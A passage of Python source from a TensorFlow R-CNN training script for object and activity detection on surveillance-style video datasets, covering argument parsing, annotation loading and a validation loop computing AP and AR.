parser.add_argument("--use_mixup", action="store_true")
parser.add_argument("--use_constant_mixup_weight", action="store_true")
parser.add_argument("--mixup_constant_weight", type=float, default=0.5)
parser.add_argument("--mixup_chance", type=float, default=0.5, help="the possibility of using mixup")
parser.add_argument("--max_mixup_per_frame", type=int, default=15)
# not used for fpn
parser.add_argument("--small_anchor_exp",action="store_true")
parser.add_argument("--positive_anchor_thres",default=0.7,type=float)
parser.add_argument("--negative_anchor_thres",default=0.3,type=float)
parser.add_argument("--fastrcnn_fg_ratio",default=0.25,type=float)
parser.add_argument("--gpu",default=1,type=int,help="number of gpu")
parser.add_argument("--gpuid_start",default=0,type=int,help="start of gpu id")
parser.add_argument("--model_per_gpu",default=1,type=int,help="it will be set as a /task:k in device")
parser.add_argument("--controller",default="/cpu:0",help="controller for multigpu training")
#parser.add_argument("--num_step",type=int,default=360000)
parser.add_argument("--num_epochs",type=int,default=12)
parser.add_argument("--save_period",type=int,default=5000,help="num steps to save model and eval")
# drop out rate
parser.add_argument('--keep_prob',default=1.0,type=float,help="1.0 - drop out rate;remember to set it to 1.0 in eval")
# l2 weight decay
parser.add_argument("--wd",default=None,type=float)# 0.0001
parser.add_argument("--init_lr",default=0.1,type=float,help=("start learning rate"))
parser.add_argument("--use_lr_decay",action="store_true")
parser.add_argument("--learning_rate_decay",default=0.94,type=float,help=("learning rate decay"))
#parser.add_argument("--learning_rate_decay_examples",default=1000000,type=int,help=("how many sample to have one decay"))
parser.add_argument("--num_epoch_per_decay",default=2.0,type=float,help=("how epoch after which lr decay"))
parser.add_argument("--use_cosine_schedule",action="store_true")
parser.add_argument("--use_exp_schedule",action="store_true")
parser.add_argument("--warm_up_steps",default=3000,type=int,help=("warm up steps not epochs"))
parser.add_argument("--same_lr_steps",default=0,type=int,help=("after warm up, keep the init_lr for k steps"))
parser.add_argument("--optimizer",default="adam",type=str,help="optimizer: adam/adadelta")
parser.add_argument("--momentum",default=0.9,type=float)
parser.add_argument("--result_score_thres",default=0.0001,type=float)
parser.add_argument("--result_per_im",default=100,type=int)
# clipping, suggest 100.0
parser.add_argument("--clip_gradient_norm",default=None,type=float,help=("norm to clip gradient to"))
# for debug
parser.add_argument("--vis_pre",action="store_true",help="visualize preprocess images")
parser.add_argument("--vis_path",default=None)
# for efficient use of COCO model classes
parser.add_argument("--use_partial_classes", action="store_true")
args = parser.parse_args()
if args.use_cosine_schedule:
args.use_lr_decay = True
if args.use_exp_schedule:
args.use_lr_decay = True
args.use_cosine_schedule = False
if args.save_all_box:
args.no_nms = True
if args.no_nms:
args.use_cpu_nms = True # so to avoid using TF nms in the graph
assert args.model_per_gpu == 1, "not work yet!"
assert args.gpu*args.model_per_gpu == args.im_batch_size # one gpu one image
#args.controller = "/cpu:0" # parameter server
# if args.add_act:
# assert len(targetAct2id) == args.num_act_class, (len(targetAct2id),args.num_act_class)
# assert len(targetSingleAct2id) == args.num_act_single_class, (len(targetSingleAct2id), args.num_act_single_class)
# assert len(targetPairAct2id) == args.num_act_pair_class
targetid2class = targetid2class
targetClass2id = targetClass2id
args.small_objects = ["Prop", "Push_Pulled_Object", "Prop_plus_Push_Pulled_Object", "Bike"]
if args.use_small_object_head:
assert args.merge_prop
args.so_eval_target = {c:1 for c in args.small_objects}
args.small_objects_targetClass2id = {c:i for i,c in enumerate(["BG"] + args.small_objects)}
args.small_objects_targetid2class = {args.small_objects_targetClass2id[one]:one for one in args.small_objects_targetClass2id}
if args.merge_prop:
targetClass2id = targetClass2id_mergeProp
targetid2class = {targetClass2id_mergeProp[one]:one for one in targetClass2id_mergeProp}
if args.diva_class2:
targetClass2id = targetClass2id_new
targetid2class = {targetClass2id_new[one]:one for one in targetClass2id_new}
if args.diva_class3:
targetClass2id = targetClass2id_new_nopo
targetid2class = {targetClass2id_new_nopo[one]:one for one in targetClass2id_new_nopo}
args.classname2id = targetClass2id
args.classid2name = targetid2class
if args.act_as_obj:
# replace the obj class with actitivy class
targetClass2id = targetAct2id
targetid2class = {targetAct2id[one]:one for one in targetAct2id}
if args.bupt_exp:
args.diva_class = True
args.act_as_obj = True
targetClass2id = targetAct2id_bupt
targetid2class = {targetAct2id_bupt[one]:one for one in targetAct2id_bupt}
if args.meva_exp:
args.diva_class = True
args.act_as_obj = True
targetClass2id = targetAct2id_meva
targetid2class = {targetAct2id_meva[one]:one for one in targetAct2id_meva}
if args.is_coco_model:
assert args.mode == "forward" or args.mode == "pack"
args.diva_class = False
targetClass2id = coco_obj_class_to_id
targetid2class = coco_obj_id_to_class
if args.use_partial_classes:
assert args.is_coco_model
args.partial_classes = [classname for classname in coco_obj_to_actev_obj]
args.classname2id = targetClass2id
args.classid2name = targetid2class
if not args.tococo:
assert len(targetid2class) == args.num_class
if not args.tococo and ((args.mode == "train") or (args.mode == "test")):
assert args.num_class == len(targetid2class.keys())
args.class_names = targetClass2id.keys()
if args.vis_pre:
assert args.vis_path is not None
if not os.path.exists(args.vis_path):
os.makedirs(args.vis_path)
if args.add_act and (args.mode == "forward"):
assert args.actoutbasepath is not None
mkdir(args.actoutbasepath)
if args.outbasepath is not None:
mkdir(args.outbasepath)
if args.skip_first_eval:
assert args.best_first is not None
if (args.outbasepath is not None) and (args.modelname is not None):
args.outpath = os.path.join(args.outbasepath,args.modelname,str(args.runId).zfill(2))
args.save_dir = os.path.join(args.outpath, "save")
args.save_dir_best = os.path.join(args.outpath, "save-best")
args.write_self_sum = True
args.self_summary_path = os.path.join(args.outpath,"train_sum.txt")
args.stats_path = os.path.join(args.outpath,"stats.json")# path to save each validation step's performance and loss
args.mrcnn_head_dim = 256
args.no_obj_detect = False
if args.mode == "videofeat":
args.no_obj_detect = True
#if args.is_cascade_rcnn:
# assert args.is_fpn
# args.cascade_num_stage = 3
# args.cascade_ious = [0.5, 0.6, 0.7]
# args.cascade_bbox_reg = [[10., 10., 5., 5.], [20., 20., 10., 10.], [30., 30., 15., 15.]]
args.anchor_stride = 16 # has to be 16 to match the image feature total stride
args.anchor_sizes = (32, 64, 128, 256, 512)
if args.small_anchor_exp:
args.anchor_sizes = (16, 32, 64, 96,128, 256) # not used for fpn
if args.is_fpn:
args.anchor_strides = (4, 8, 16, 32, 64)
# we will pad H,W to be zheng chu by 32
args.fpn_resolution_requirement = float(args.anchor_strides[3]) # [3] is 32, since there is a total pixel reduce of 2x2x2x2x2
args.max_size = np.ceil(args.max_size / args.fpn_resolution_requirement) * args.fpn_resolution_requirement
#args.fpn_num_channel = 256
#args.fpn_frcnn_fc_head_dim = 1024
if args.load_best:
args.load = True
if args.load_from is not None:
args.load = True
if args.mode == "train":
assert args.outbasepath is not None
assert args.modelname is not None
args.is_train = True
mkdir(args.save_dir)
mkdir(args.save_dir_best)
else:
args.is_train = False
args.num_epochs = 1
if args.get_rpn_out:
if not os.path.exists(args.rpn_out_path):
os.makedirs(args.rpn_out_path)
# ---- all the mask rcnn config
args.resnet_num_block = [3, 4, 23, 3] # resnet 101
args.use_basic_block = False # for resnet-34 and resnet-18
if args.resnet152:
args.resnet_num_block = [3, 8, 36, 3]
if args.resnet50:
args.resnet_num_block = [3, 4, 6, 3]
if args.resnet34:
args.resnet_num_block = [3, 4, 6, 3]
args.use_basic_block = True
if args.resnet18:
args.resnet_num_block = [2, 2, 2, 2]
args.use_basic_block = True
#args.short_edge_size = 800
#args.max_size = 1333
args.anchor_ratios = (0.5, 1, 2)
args.num_anchors = len(args.anchor_sizes) * len(args.anchor_ratios)
# iou thres to determine anchor label
#args.positive_anchor_thres = 0.7
#args.negative_anchor_thres = 0.3
# when getting region proposal, avoid getting too large boxes
args.bbox_decode_clip = np.log(args.max_size / 16.0)
# RPN training
args.rpn_fg_ratio = 0.5
args.rpn_batch_per_im = args.rpn_batch_size
args.rpn_min_size = 0 # 8?
args.rpn_proposal_nms_thres = 0.7
args.rpn_train_pre_nms_topk = 12000 # not used in fpn
args.rpn_train_post_nms_topk = 2000# this is used for fpn_nms_pre
# fastrcnn
args.fastrcnn_batch_per_im = args.frcnn_batch_size
args.fastrcnn_bbox_reg_weights = np.array([10, 10, 5, 5], dtype='float32')
#args.fastrcnn_bbox_reg_weights = np.array([20, 20, 10, 10], dtype='float32')
args.fastrcnn_fg_thres = 0.5 # iou thres
#args.fastrcnn_fg_ratio = 0.25 # 1:3 -> pos:neg
# testing
args.rpn_test_pre_nms_topk = 6000
#args.rpn_test_post_nms_topk = 700 #1300 # 700 takes 40 hours, # OOM at 1722,28,28,1024 # 800 OOM for gpu4
#args.fastrcnn_nms_thres = 0.5
#args.fastrcnn_nms_iou_thres = 0.5 # 0.3 is worse
#args.result_score_thres = 0.0001
#args.result_per_im = 100 # 400 # 100
if args.focal_loss and args.clip_gradient_norm is None:
print("Focal loss needs gradient clipping or will have NaN loss")
sys.exit()
return args
def add_coco(config,datajson):
coco = COCO(datajson)
cat_ids = coco.getCatIds() #[80], each is 1-90
cat_names = [c['name'] for c in coco.loadCats(cat_ids)] # [80]
config.classId_to_cocoId = {(i+1):v for i,v in enumerate(cat_ids)}
config.class_names = ["BG"] + cat_names
config.class_to_classId = {c:i for i,c in enumerate(config.class_names)} # 0-80
config.classId_to_class = {i:c for i,c in enumerate(config.class_names)}
# load all ground truth into memory
def read_data_diva(config, idlst, framepath, annopath, tococo=False, randp=None, is_train=False):
assert idlst is not None
assert framepath is not None
assert annopath is not None
assert len(targetid2class.keys()) == config.num_class
# load the coco class name to classId so we could convert the label name to label classId
if tococo:
add_coco(config,config.datajson)
imgs = [os.path.splitext(os.path.basename(line.strip()))[0] for line in open(idlst,"r").readlines()]
if randp is not None:
imgs = random.sample(imgs,int(len(imgs)*randp))
data = {"imgs":[], "gt":[]}
if config.use_mixup and is_train:
data['mixup_weights'] = []
print("loading data..")
if config.print_params:
imgs = imgs[:100]
# in diva dataset, some class may be ignored
ignored_classes = {}
targetClass2exist = {classname:0 for classname in targetClass2id}
num_empty_actboxes = 0
targetAct2exist = {classname:0 for classname in targetAct2id}
ignored_act_classes = {}
num_empty_single_actboxes = 0
ignored_single_act_classes = {}
targetAct2exist_single = {classname:0 for classname in targetSingleAct2id}
act_single_fgratio = []
if config.debug:
imgs = imgs[:1000]
if (config.train_skip > 1) and is_train:
imgs.sort()
ori_num = len(imgs)
imgs = imgs[config.train_skip_offset::config.train_skip]
print("skipping [%s::%s], got %s/%s"%(config.train_skip_offset,config.train_skip,len(imgs),ori_num))
if (config.val_skip > 1) and not is_train:
imgs.sort()
ori_num = len(imgs)
imgs = imgs[config.val_skip_offset::config.val_skip]
print("skipping [%s::%s], got %s/%s"%(config.val_skip_offset,config.val_skip,len(imgs),ori_num))
# get starts for each img, the label distribution
label_dist = {classname:[] for classname in targetClass2id} # class -> [] num_box in each image
label_dist_all = []
for img in tqdm(imgs, ascii=True, smoothing=0.5):
anno = os.path.join(annopath,"%s.npz"%img)
videoname = img.strip().split("_F_")[0]
if not os.path.exists(anno):
continue
if config.check_img_exist:
if not os.path.exists(os.path.join(framepath, videoname, "%s.jpg"%img)):
continue
anno = dict(np.load(anno, allow_pickle=True)) # 'boxes' -> [K,4]
# boxes are x1,y1,x2,y2
original_box_num = len(anno['boxes'])
# feed act box as object boxes
if config.act_as_obj:
anno['labels'] = anno['actlabels']
anno['boxes'] = anno['actboxes']
# labels are one word, diva classname
labels = []
boxes = []
no_so_box = True
no_object = True
for i,classname in enumerate(list(anno['labels'])):
if classname in targetClass2id or (
config.bupt_exp and classname in bupt_act_mapping) or (
config.meva_exp and classname in meva_act_mapping):
if config.bupt_exp and classname in bupt_act_mapping:
classname = bupt_act_mapping[classname]
if config.meva_exp and classname in meva_act_mapping:
classname = meva_act_mapping[classname]
targetClass2exist[classname] = 1
labels.append(targetClass2id[classname])
boxes.append(anno['boxes'][i])
else:
ignored_classes[classname] = 1
if classname in config.small_objects:
no_so_box=False
if config.skip_no_object is not None:
if classname == config.skip_no_object:
no_object = False
if config.use_mixup and is_train:
mixup_boxes = []
mixup_labels = []
for i, classname in enumerate(list(anno['mixup_labels'])[:config.max_mixup_per_frame]):
if targetClass2id.has_key(classname):
# not adding now, during run time will maybe add them
#labels.append(targetClass2id[classname])
#boxes.append(anno['mixup_boxes'][i])
mixup_boxes.append(anno['mixup_boxes'][i])
mixup_labels.append(targetClass2id[classname])
anno['mixup_boxes'] = np.array(mixup_boxes, dtype="float32")
anno['mixup_labels'] = mixup_labels
anno['boxes'] = np.array(boxes,dtype="float32")
anno['labels'] = labels
#assert len(anno['boxes']) > 0
if len(anno['boxes']) == 0:
continue
if config.skip_no_so_img and is_train:
if no_so_box:
continue
if config.skip_no_object and is_train:
if no_object:
continue
assert len(anno['labels']) == len(anno['boxes']), (anno['labels'], anno['boxes'])
assert anno['boxes'].dtype == np.float32
if config.oversample_so_img and is_train and not no_so_box:
for i in xrange(config.oversample_x):
data['imgs'].append(os.path.join(framepath, videoname, "%s.jpg"%img))
data['gt'].append(anno)
# statics
if config.show_stat:
for classname in label_dist:
num_box_this_img = len([l for l in labels if l == targetClass2id[classname]])
label_dist[classname].append(num_box_this_img)
label_dist_all.append(len(labels))
if config.add_act:
# for activity anno, we couldn't remove any of the boxes
assert len(anno['boxes']) == original_box_num
if config.act_v2:
# make multi class labels
# BG class is at index 0
K = len(anno['boxes'])
actSingleLabels = np.zeros((K,config.num_act_single_class),dtype="uint8")
# use this to mark BG
hasClass = np.zeros((K),dtype="bool")
for i,classname in enumerate(list(anno['actSingleLabels'])):
if targetSingleAct2id.has_key(classname):
targetAct2exist_single[classname] = 1
act_id = targetSingleAct2id[classname]
box_id = anno['actSingleIdxs'][i]
assert box_id >=0 and box_id < K
actSingleLabels[box_id,act_id] = 1
hasClass[box_id] = True
else:
ignored_single_act_classes[classname] = 1
# mark the BG for boxes that has not activity annotation
actSingleLabels[np.logical_not(hasClass), 0] = 1
anno['actSingleLabels_npy'] = actSingleLabels
# compute the BG vs FG ratio for the activity boxes
act_single_fgratio.append(sum(hasClass)/float(K))
if sum(hasClass) == 0:
num_empty_single_actboxes+=1
continue
else:
act_labels = []
act_good_ids = []
for i,classname in enumerate(list(anno['actlabels'])):
if targetAct2id.has_key(classname):
targetAct2exist[classname] = 1
act_labels.append(targetAct2id[classname])
act_good_ids.append(i)
else:
ignored_act_classes[classname] = 1
#print anno['actboxes'].shape
if anno['actboxes'].shape[0] == 0:# ignore this image
num_empty_actboxes+=1
continue
anno['actboxes'] = anno['actboxes'][act_good_ids]
anno['actboxidxs'] = anno['actboxidxs'][act_good_ids] # it is a npy array of python list, so no :
anno['actlabels'] = act_labels
assert len(anno['actboxes']) == len(anno['actlabels'])
if config.use_mixup and is_train:
# the training lst and annotation is framename_M_framename.npz files
framename1, framename2 = img.strip().split("_M_")
videoname1 = framename1.strip().split("_F_")[0]
videoname2 = framename2.strip().split("_F_")[0]
data['imgs'].append((os.path.join(framepath, videoname1,"%s.jpg"%framename1), os.path.join(framepath, videoname2,"%s.jpg"%framename2)))
data['gt'].append(anno)
weight = np.random.beta(1.5, 1.5)
if config.use_constant_mixup_weight:
weight = config.mixup_constant_weight
data['mixup_weights'].append(weight)
else:
data['imgs'].append(os.path.join(framepath,videoname,"%s.jpg"%img))
data['gt'].append(anno)
print("loaded %s/%s data"%(len(data['imgs']),len(imgs)))
if config.show_stat:
for classname in label_dist:
d = label_dist[classname]
ratios = [a/float(b) for a,b in zip(d, label_dist_all)]
print("%s, [%s - %s], median %s per img, ratio:[%.3f - %.3f], median %.3f, no label %s/%s [%.3f]"%(classname, min(d), max(d), np.median(d), min(ratios), max(ratios), np.median(ratios), len([i for i in d if i==0]), len(d),len([i for i in d if i==0])/float(len(d))))
print("each img has boxes: [%s - %s], median %s"%(min(label_dist_all),max(label_dist_all),np.median(label_dist_all),))
if len(ignored_classes) > 0:
print("ignored %s "%(ignored_classes.keys()))
noDataClasses = [classname for classname in targetClass2exist if targetClass2exist[classname] ==0]
if len(noDataClasses) > 0:
print("warning: class data not exists: %s, AR will be 1.0 for these"%(noDataClasses))
if config.add_act:
if config.act_v2:
print(" each frame positive act box percentage min %.4f, max %.4f, mean %.4f"%(min(act_single_fgratio),max(act_single_fgratio),np.mean(act_single_fgratio)))
if len(ignored_single_act_classes) > 0:
print("ignored activity %s"%(ignored_single_act_classes.keys()))
print("%s/%s has no single activity boxes"%(num_empty_single_actboxes, len(data['imgs'])))
noDataClasses = [classname for classname in targetAct2exist_single if targetAct2exist_single[classname] ==0]
if len(noDataClasses) > 0:
print("warning: single activity class data not exists: %s, "%(noDataClasses))
else:
if len(ignored_act_classes) > 0:
print("ignored activity %s"%(ignored_act_classes.keys()))
print("%s/%s has no activity boxes"%(num_empty_actboxes, len(data['imgs'])))
noDataClasses = [classname for classname in targetAct2exist if targetAct2exist[classname] ==0]
if len(noDataClasses) > 0:
print("warning: activity class data not exists: %s, "%(noDataClasses))
return Dataset(data,add_gt=True)
# given the gen_gt_diva
# train on diva dataset
def train_diva(config):
global eval_target,targetid2class,targetClass2id
eval_target_weight = None
if config.diva_class:
# only care certain classes
#eval_target = ["Vehicle","Person","Construction_Barrier","Door","Dumpster","Prop","Push_Pulled_Object","Bike","Parking_Meter"]
eval_target = ["Vehicle","Person","Prop","Push_Pulled_Object","Bike"]
eval_target = {one:1 for one in eval_target}
eval_target_weight ={
"Person":0.15,
"Vehicle":0.15,
"Prop":0.15,
"Push_Pulled_Object":0.15,
"Bike":0.15,
}
if config.merge_prop:
eval_target = ["Vehicle","Person","Prop","Push_Pulled_Object","Bike", "Prop_plus_Push_Pulled_Object"]
eval_target = {one:1 for one in eval_target}
eval_target_weight ={
"Person":0.15,
"Vehicle":0.15,
"Prop_plus_Push_Pulled_Object":0.2,
"Bike":0.2,
"Prop":0.15,
"Push_Pulled_Object":0.15,
}
if config.diva_class2:
# only care certain classes
#eval_target = ["Vehicle","Person","Construction_Barrier","Door","Dumpster","Prop","Push_Pulled_Object","Bike","Parking_Meter"]
eval_target = ["Vehicle", "Person", "Prop", "Push_Pulled_Object", "Bike", "Construction_Vehicle", "Bike_Person", "Prop_Person", "Skateboard_Person"]
eval_target = {one:1 for one in eval_target}
eval_target_weight = {one:1.0/len(eval_target) for one in eval_target}
if config.diva_class3:
# only care certain classes
#eval_target = ["Vehicle","Person","Construction_Barrier","Door","Dumpster","Prop","Push_Pulled_Object","Bike","Parking_Meter"]
#eval_target = ["Vehicle", "Person", "Prop", "Push_Pulled_Object", "Bike", "Construction_Vehicle"]
# removed construction vehicle 03/2019
eval_target = ["Vehicle", "Person", "Prop", "Push_Pulled_Object", "Bike"]
eval_target = {one:1 for one in eval_target}
eval_target_weight = {one:1.0/len(eval_target) for one in eval_target}
if config.add_act:
# same for single box act
act_eval_target = ["vehicle_turning_right","vehicle_turning_left","Unloading","Transport_HeavyCarry","Opening","Open_Trunk","Loading","Exiting","Entering","Closing_Trunk","Closing","Interacts","Pull","Riding","Talking","activity_carrying","specialized_talking_phone","specialized_texting_phone"] # "vehicle_u_turn" is not used since not exists in val set
act_eval_target = {one:1 for one in act_eval_target}
act_eval_target_weight ={one:1.0/len(act_eval_target) for one in act_eval_target}
if config.act_as_obj:
eval_target = ["vehicle_turning_right","vehicle_turning_left","Unloading","Transport_HeavyCarry","Opening","Open_Trunk","Loading","Exiting","Entering","Closing_Trunk","Closing","Interacts","Pull","Riding","Talking","activity_carrying","specialized_talking_phone","specialized_texting_phone"] # "vehicle_u_turn" is not used since not exists in val set
if config.bupt_exp:
eval_target = ["Person-Vehicle", "Vehicle-Turning", "Transport_HeavyCarry","Pull","Riding","Talking","activity_carrying","specialized_talking_phone","specialized_texting_phone"]
if config.meva_exp:
eval_target = ["Person-Vehicle", "Vehicle-Turning", "Person-Structure",
"Person_Heavy_Carry", "People_Talking", "Riding",
"Person_Sitting_Down", "Person_Sets_Down_Object"]
eval_target = {one:1 for one in eval_target}
eval_target_weight ={one:1.0/len(eval_target) for one in eval_target}
self_summary_strs = Summary()
stats = [] # tuples with {"metrics":,"step":,}
# load the frame count data first
train_data = read_data_diva(config,config.trainlst,config.imgpath,config.annopath,tococo=False,is_train=True) # True to filter data
val_data = read_data_diva(config,config.vallst,config.valframepath,config.valannopath,tococo=False)#,randp=0.02)
config.train_num_examples = train_data.num_examples
if config.show_stat:
sys.exit()
# the total step (iteration) the model will run
num_steps = int(math.ceil(train_data.num_examples/float(config.im_batch_size)))*config.num_epochs
num_val_steps = int(math.ceil(val_data.num_examples/float(config.im_batch_size)))*1
#config_vars = vars(config)
#self_summary_strs.add("\t"+ " ,".join(["%s:%s"%(key,config_vars[key]) for key in config_vars]))
# model_per_gpu > 1 not work yet, need to set distributed computing
#cluster = tf.train.ClusterSpec({"local": ["localhost:8000","localhost:8001"]})
#server = tf.train.Server(cluster, job_name="local", task_index=0)
#server = tf.train.Server(cluster, job_name="local", task_index=1)
# two model, this is the lazy way
#model = get_model(config) # input is image paths
models = []
gpuids = range(config.gpuid_start, config.gpuid_start+config.gpu)
gpuids = gpuids * config.model_per_gpu
# example, model_per_gpu=2, gpu=2, gpuid_start=0
gpuids.sort()# [0,0,1,1]
taskids = range(config.model_per_gpu) * config.gpu # [0,1,0,1]
for i,j in zip(gpuids,taskids):
models.append(get_model(config,gpuid=i,task=j,controller=config.controller))
config.is_train=False
models_eval = []
for i,j in zip(gpuids,taskids):
models_eval.append(get_model(config,gpuid=i,task=j,controller=config.controller))
config.is_train=True
trainer = Trainer(models,config)
tester = Tester(models_eval,config,add_mask=config.add_mask) # need final box and stuff?
saver = tf.train.Saver(max_to_keep=5) # how many model to keep
bestsaver = tf.train.Saver(max_to_keep=5) # just for saving the best model
# start training!
# allow_soft_placement : tf will auto select other device if the tf.device(*) not available
tfconfig = tf.ConfigProto(allow_soft_placement=True)#,log_device_placement=True)
if not config.use_all_mem:
tfconfig.gpu_options.allow_growth = True # this way it will only allocate nessasary gpu, not take all
tfconfig.gpu_options.visible_device_list = "%s"%(",".join(["%s"%i for i in range(config.gpuid_start, config.gpuid_start+config.gpu)])) # so only this gpu will be used
#print tfconfig.gpu_options.visible_device_list
# or you can set hard limit
#tfconfig.gpu_options.per_process_gpu_memory_fraction = 0.4
with tf.Session(config=tfconfig) as sess:
self_summary_strs.add("total parameters: %s"%(cal_total_param()))
initialize(load=config.load,load_best=config.load_best,config=config,sess=sess)
if config.print_params:
for var in tf.global_variables():
not_show=False
for c in ["Adam","beta1_power","beta2_power","Adam_1","Adadelta_1","Adadelta","Momentum"]:
if c in var.name:
not_show=True
if not_show:
continue
shape = var.get_shape()
print("%s %s\n"%(var.name,shape))
sys.exit()
isStart = True
best = (-1.0,1)
loss_me, wd_me, rpn_label_loss_me, rpn_box_loss_me, fastrcnn_label_loss_me, fastrcnn_box_loss_me, so_label_loss_me, act_loss_me, lr_me = [FIFO_ME(config.loss_me_step) for i in xrange(9)]
for batch in tqdm(train_data.get_batches(config.im_batch_size,num_batches=num_steps),total=num_steps,ascii=True,smoothing=1):
global_step = sess.run(models[0].global_step) + 1 # start from 0 or the previous step
validation_performance = None
if (global_step % config.save_period == 0) or (config.load and isStart and ((config.ignore_vars is None) or config.force_first_eval)): # time to save model
tqdm.write("step:%s/%s (epoch:%.3f)"%(global_step,num_steps,(config.num_epochs*global_step/float(num_steps))))
tqdm.write("\tsaving model %s..."%global_step)
saver.save(sess,os.path.join(config.save_dir,"model"),global_step=global_step)
tqdm.write("\tdone")
if config.skip_first_eval and isStart:
tqdm.write("skipped first eval...")
validation_performance = config.best_first
else:
e = {one:{} for one in eval_target.keys()} # cat_id -> imgid -> {"dm","dscores"}
if config.add_act:
e_act = {one:{} for one in act_eval_target.keys()}
if config.use_small_object_head:
e_so = {one:{} for one in config.so_eval_target.keys()}
for val_batch_ in tqdm(val_data.get_batches(config.im_batch_size,num_batches=num_val_steps,shuffle=False),total=num_val_steps,ascii=True,smoothing=1):
batch_idx,val_batches = val_batch_
this_batch_num = len(val_batches)
# multiple image at a time for parallel inferencing with multiple gpu
scales = []
imgids = []
for val_batch in val_batches:
# load the image here and resize
image = cv2.imread(val_batch.data['imgs'][0],cv2.IMREAD_COLOR)
imgid = os.path.splitext(os.path.basename(val_batch.data['imgs'][0]))[0]
imgids.append(imgid)
assert image is not None,image
image = image.astype("float32")
val_batch.data['imgdata'] = [image]
resized_image = resizeImage(image,config.short_edge_size,config.max_size)
# rememember the scale and original image
ori_shape = image.shape[:2]
#print(image.shape, resized_image.shape
# average H/h and W/w ?
scale = (resized_image.shape[0]*1.0/image.shape[0] + resized_image.shape[1]*1.0/image.shape[1])/2.0
val_batch.data['resized_image'] = [resized_image]
scales.append(scale)
outputs = tester.step(sess,val_batch_)
# post process this batch, also remember the ground truth
for i in xrange(this_batch_num): # num gpu
imgid = imgids[i]
scale = scales[i]
if config.add_act:
if config.act_v2:
boxes, labels, probs, actsingleboxes, actsinglelabels = outputs[i]
actsingleboxes = actsingleboxes / scale
else:
boxes, labels, probs, actboxes, actlabels,actprobs = outputs[i]
actboxes = actboxes / scale
else:
if config.add_mask:
boxes, labels, probs, masks = outputs[i]
else:
if config.use_small_object_head:
boxes, labels, probs, so_boxes, so_labels, so_probs = outputs[i]
so_boxes = so_boxes / scale
else:
boxes, labels, probs = outputs[i]
if config.use_cpu_nms:
boxes, labels, probs = nms_wrapper(boxes, probs, config)
val_batch = val_batches[i]
boxes = boxes / scale
# each class's detection box and prob
target_dt_boxes = gather_dt(boxes,probs,labels,eval_target,targetid2class,tococo=config.tococo,coco_class_names=config.class_names)
# gt
anno = val_batch.data['gt'][0] # one val_batch is single image
gt_boxes = gather_gt(anno['boxes'],anno['labels'],eval_target,targetid2class)
# gt_boxes and target_dt_boxes for this image
# eval on one single image
match_dt_gt(e,imgid,target_dt_boxes,gt_boxes,eval_target)
if config.use_small_object_head:
target_so_dt_boxes = gather_dt(so_boxes, so_probs, so_labels, config.so_eval_target, config.small_objects_targetid2class)
anno = val_batch.data['gt'][0] # one val_batch is single image
small_object_classids = [targetClass2id[one] for one in config.small_objects]
idxs = [i for i in xrange(len(anno['labels'])) if anno['labels'][i] in small_object_classids]
gt_so_boxes = [anno['boxes'][i] for i in idxs]
# convert the original classid to the small object class id
gt_so_labels = [small_object_classids.index(anno['labels'][i])+1 for i in idxs]
gt_so_boxes = gather_gt(gt_so_boxes, gt_so_labels, config.so_eval_target, config.small_objects_targetid2class)
match_dt_gt(e_so, imgid, target_so_dt_boxes, gt_so_boxes, config.so_eval_target)
# eval the act box as well, put stuff in e_act
if config.add_act and config.act_v2:
# for v2, we have the single and pair boxes
# actsingleboxes [K,4]
# actsinglelabels [K,num_act_class]
# first we filter the BG boxes
topk=config.act_single_topk # we select topk act class for each box
single_act_boxes,single_act_labels,single_act_probs = gather_act_singles(actsingleboxes,actsinglelabels,topk)
target_act_dt_boxes = gather_dt(single_act_boxes,single_act_probs,single_act_labels,act_eval_target,targetsingleactid2class)
# to collect the ground truth, each label will be a stand alone boxes
anno = val_batch.data['gt'][0] # one val_batch is single image
gt_single_act_boxes = []
gt_single_act_labels = []
gt_obj_boxes = anno['boxes']
for bid,label in zip(anno['actSingleIdxs'],anno['actSingleLabels']):
if label in act_eval_target:
gt_single_act_boxes.append(gt_obj_boxes[bid])
gt_single_act_labels.append(targetSingleAct2id[label])
gt_act_boxes = gather_gt(gt_single_act_boxes,gt_single_act_labels,act_eval_target,targetsingleactid2class)
match_dt_gt(e_act,imgid,target_act_dt_boxes,gt_act_boxes,act_eval_target)
if config.add_act and not config.act_v2:
target_act_dt_boxes = gather_dt(actboxes,actprobs,actlabels,act_eval_target,targetactid2class)
#gt
anno = val_batch.data['gt'][0] # one val_batch is single image
gt_act_boxes = gather_gt(anno['actboxes'],anno['actlabels'],act_eval_target,targetactid2class)
# gt_boxes and target_dt_boxes for this image
match_dt_gt(e_act,imgid,target_act_dt_boxes,gt_act_boxes,act_eval_target)
# we have the dm and g matching for each image in e & e_act
# max detection per image per category
aps,ars = aggregate_eval(e,maxDet=100)
aps_str = "|".join(["%s:%.5f"%(class_,aps[class_]) for class_ in aps])
ars_str = "|".join(["%s:%.5f"%(class_,ars[class_]) for class_ in ars])
#tqdm.write("\tval in %s at step %s, AP:%s, AR:%s, previous best AR for %s at %s is %.5f"%(num_val_steps,global_step,aps_str,ars_str,eval_best,best[1],best[0]))
#validation_performance = ars[eval_best]
# now we use average AR and average AP or weighted
average_ap,average_ar = weighted_average(aps,ars,eval_target_weight)
ap_weight = 1.0
ar_weight = 0.0
validation_performance = average_ap*ap_weight + average_ar*ar_weight
if config.add_act:
obj_validation_performance = validation_performance
aps,ars = aggregate_eval(e_act,maxDet=100)
act_aps_str = "|".join(["%s:%.5f"%(class_,aps[class_]) for class_ in aps])
act_ars_str = "|".join(["%s:%.5f"%(class_,ars[class_]) for class_ in ars])
average_ap,average_ar = weighted_average(aps,ars,act_eval_target_weight)
ap_weight = 0.9
ar_weight = 0.1
act_validation_performance = average_ap*ap_weight + average_ar*ar_weight
act_perf_weight = 0.5
obj_perf_weight = 0.5
validation_performance = obj_perf_weight*obj_validation_performance + act_perf_weight*act_validation_performance
tqdm.write("\tval in %s at step %s, Obj AP:%s, AR:%s, obj performance %s"%(num_val_steps,global_step,aps_str,ars_str,obj_validation_performance))
tqdm.write("\tAct AP:%s, AR:%s, this step val:%.5f, previous best val at %s is %.5f"%(act_aps_str,act_ars_str,validation_performance,best[1],best[0]))
else:
if config.use_small_object_head:
so_aps, so_ars = aggregate_eval(e_so, maxDet=100)
so_average_ap, so_average_ar = weighted_average(so_aps, so_ars)
so_val = so_average_ap*0.5 + so_average_ar*0.5
so_weight = 0.5
validation_performance = (1 - so_weight)*validation_performance + so_weight*so_val
so_aps_str = "|".join(["%s:%.5f"%(class_,so_aps[class_]) for class_ in so_aps])
